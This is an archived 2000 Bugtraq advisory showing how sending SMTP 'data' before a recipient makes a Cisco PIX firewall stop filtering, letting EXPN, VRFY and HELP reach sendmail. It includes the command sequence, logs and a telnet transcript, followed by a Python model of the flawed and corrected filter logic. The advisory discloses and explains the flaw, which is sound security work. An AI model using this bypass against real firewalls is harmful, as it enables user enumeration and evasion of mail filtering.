Date:         Tue, 19 Sep 2000 18:27:49 +0200
From: naif <naif@INET.IT>
Subject:      Cisco PIX Firewall (smtp content filtering hack)
To: BUGTRAQ@SECURITYFOCUS.COM

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

How to escape the "fixup smtp" of the Cisco PIX Firewall:

The Cisco PIX Firewall normally restricts some protocol commands (http, ftp, smtp) and manages
multisession protocols (h323, ftp, sqlnet).
I made some tests on a BSDI 3.0 box running sendmail9 placed in the DMZ.
The PIX version is the latest, 5.2(1)... here is the output of "show ver":
=====================================================
Cisco Secure PIX Firewall Version 5.2(1)

Compiled on Tue 22-Aug-00 23:35 by bhochuli

pixtest1 up 22 days 5 hours

Hardware:   SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB

0: ethernet0: address is 00d0.b790.41a5, irq 11
1: ethernet1: address is 00d0.b790.54d4, irq 10
2: ethernet2: address is 00e0.b601.d289, irq 15
3: ethernet3: address is 00e0.b601.d288, irq 9
4: ethernet4: address is 00e0.b601.d287, irq 11
5: ethernet5: address is 00e0.b601.d286, irq 10

Licensed Features:
Failover:       Enabled
VPN-DES:        Enabled
VPN-3DES:       Enabled
Maximum Interfaces:     6
Cut-through Proxy:      Enabled
Guards:         Enabled
Websense:       Enabled
Throughput:     Unlimited
ISAKMP peers:   Unlimited
=======================================================
When a new connection is established, the PIX uses its fixup filter to nullify every command
that isn't in its "allowed list" (such as HELO, MAIL FROM:, RCPT TO:, DATA, RSET, QUIT).
For example, following the "security through obscurity" concept, it rewrites the banner of
the original MTA.
This is a sendmail...

220 *********************************************************2000 ***0******0200 ******

Now, the PIX nullifies the help command, and if I write an e-mail to my friend asking for ''help'', it should drop
the line on which I write "help".
So the Cisco PIX Firewall, after the "data" command, disables the fixup until "<CR><LF><CR><LF>.<CR><LF>".
Now what happens if I don't complete the e-mail, or I immediately type "data" in place of the normal
"helo, mail from, rcpt to, data, quit"?
The PIX disables the fixup and gives me a direct channel to the MTA without doing content filtering.

Here is an example of what I could do exploiting this bug:
helo ciao
mail from: pinco@pallino.it
data                                 ( From here the PIX disables fixup )
expn guest                           ( Now I could enumerate users
vrfy oracle                            and have access to all commands )
help
whatever command I want
quit

Greetings to Cisco and its Security Products!

Here is the log of my test...

- IP of the client: 10.10.10.10
- Public IP of the server: 10.10.10.2
- Private IP of the server: 172.16.1.2


=====
The sendmail log:

Sep 19 14:06:19 testbox sendmail[14163]: NOQUEUE: Authentication-Warning: testbox.test.it: [10.10.10.10] didn't use HELO protocol
Sep 19 14:07:36 testbox sendmail[14164]: NOQUEUE: [10.10.10.10]: expn pinco
Sep 19 14:08:03 testbox sendmail[14165]: NOQUEUE: [10.10.10.10]: vrfy pallino
Sep 19 14:08:50 testbox sendmail[14163]: OAA14163: from=pix@il.firewall.cattivo.it, size=0, class=0, pri=0, nrcpts=0, proto=SMTP, relay=[10.10.10.10]



=====
Here is the output of "debug fixup tcp" on the PIX:

        tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        tcp: SYN out rcvd
        tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        tcp: exiting embyonic
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: unknown command
        smtp: X-ing ciao pix mi vuoi rispondere?

smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: help command
        smtp: nullify <help> command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: mail command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: data command
        smtp: entering data mode

###### From here the PIX thinks that I'm writing the e-mail body, so it disables fixup
###### and I can inject my malicious commands without having them nullified.

smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)




Here is the telnet session:

naif:~# telnet  10.10.10.2 25
Trying 10.10.10.2...
Connected to 10.10.10.2.
Escape character is '^]'.
220 *********************************************************2000 ***0******0200 ******
ciao pix mi vuoi rispondere?
500 Command unrecognized: "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"
help
500 Command unrecognized: "XXXX"
mail from: pix@il.firewall.cattivo.it
250 pix@il.firewall.cattivo.it... Sender ok
data
503 Need RCPT (recipient)

#### LOOK, FROM HERE FIXUP IS DISABLED :)))

help
214-This is Sendmail version 8.9.1
214-Topics:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB    ETRN    DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214-    sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your site.
214 End of HELP info
expn pinco
550 pinco... User unknown
vrfy pallino
550 pallino... User unknown


The End

Greetings to bolo for the PIX and the BSDI box :)
Kiss to my love NaiL^d0d :****


naif

e-mail:`echo "donlayiufhg@wiltoragpyzagvcm.wmdnehhqrstzwr" | tr -d \
              'bdghlmoqrsuvwzy'`

:pp

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org
Filter: gpg4pine 4.1 (http://azzie.robotics.net)

iD8DBQE5x5QLdK5I1NnlcMYRAscOAKCv+DvZ3mx4+7UT6LpFyuEQNlD57gCfRJoB
2FEU8a6f1ZhtmDq82pOh3nE=
=0UD1
-----END PGP SIGNATURE-----
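The state-tracking mistake the post describes can be shown with a toy model of an SMTP command filter. The code below is an added example written for this page; it is not Cisco's code, does not reproduce the PIX implementation, and the class, function and variable names are all assumptions. It contrasts a filter that stops inspecting as soon as the client sends DATA (the behaviour seen in the debug output above, where "entering data mode" follows the client's DATA even though the MTA answered 503) with one that keeps inspecting until the server actually accepts the body with a 354 reply. The exchange it replays is constructed from the telnet session in the post.

```python
"""Toy model of an SMTP command filter (added example, not the PIX code).

Two variants of the same filter are compared:
  client_driven_data_mode=True  : enter DATA mode on the client's DATA alone
                                  (the flaw described in the post)
  client_driven_data_mode=False : enter DATA mode only after the server has
                                  accepted DATA with a 354 reply (corrected)
"""

# Hypothetical allow-list modelled on the verbs the post says the PIX permits.
ALLOWED_VERBS = {"HELO", "EHLO", "MAIL", "RCPT", "DATA", "RSET", "NOOP", "QUIT"}


class SmtpCommandFilter:
    def __init__(self, client_driven_data_mode):
        self.client_driven = client_driven_data_mode
        self.in_data = False        # True while a message body is in transit
        self.awaiting_354 = False   # DATA forwarded, server verdict not yet seen

    def from_client(self, line):
        """Return the client line as forwarded to the MTA (possibly nullified)."""
        if self.in_data:
            if line == ".":           # end-of-data marker closes the body
                self.in_data = False
            return line               # body lines are never inspected
        verb = line.split(" ", 1)[0].upper()
        if verb not in ALLOWED_VERBS:
            return "X" * len(line)    # overwrite with X's, as the transcript shows
        if verb == "DATA":
            if self.client_driven:
                self.in_data = True   # the flaw: trust the client's DATA alone
            else:
                self.awaiting_354 = True
        return line

    def from_server(self, line):
        """Track the MTA's reply to a pending DATA; the line itself is unchanged."""
        if self.awaiting_354:
            self.awaiting_354 = False
            if line.startswith("354"):
                self.in_data = True   # only now is a body really being sent
        return line


# Constructed exchange modelled on the post's telnet session: DATA is sent before
# any RCPT, so the MTA rejects it with 503 and stays in command mode.
EXCHANGE = [
    ("S", "220 testbox.test.it ESMTP"),   # constructed banner
    ("C", "ciao pix mi vuoi rispondere?"),
    ("S", '500 Command unrecognized: "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"'),
    ("C", "help"),
    ("S", '500 Command unrecognized: "XXXX"'),
    ("C", "mail from: pix@il.firewall.cattivo.it"),
    ("S", "250 pix@il.firewall.cattivo.it... Sender ok"),
    ("C", "data"),
    ("S", "503 Need RCPT (recipient)"),
    ("C", "help"),
    ("C", "expn pinco"),
    ("C", "vrfy pallino"),
]


def run_filter(client_driven_data_mode):
    """Replay EXCHANGE; return (original, forwarded) pairs for client lines."""
    flt = SmtpCommandFilter(client_driven_data_mode)
    pairs = []
    for side, line in EXCHANGE:
        if side == "C":
            pairs.append((line, flt.from_client(line)))
        else:
            flt.from_server(line)
    return pairs


def leaked_verbs(client_driven_data_mode):
    """Verbs outside the allow-list that reached the MTA unmodified."""
    leaked = []
    for original, forwarded in run_filter(client_driven_data_mode):
        verb = original.split(" ", 1)[0].upper()
        if forwarded == original and verb not in ALLOWED_VERBS:
            leaked.append(verb)
    return leaked


if __name__ == "__main__":
    for mode, label in ((True, "client-driven"), (False, "server-confirmed")):
        print(f"{label:17s} leaked: {leaked_verbs(mode)}")
        for original, forwarded in run_filter(mode):
            print(f"  {original!r:42s} -> {forwarded!r}")
```

The server-confirmed variant stays in command mode after the 503, so the HELP, EXPN and VRFY lines that follow the premature DATA are still nullified; the client-driven variant forwards them intact. The general point for any protocol-aware filter is the same: a state transition that suppresses inspection must be driven by the server's acceptance of the command, not by the client's request alone.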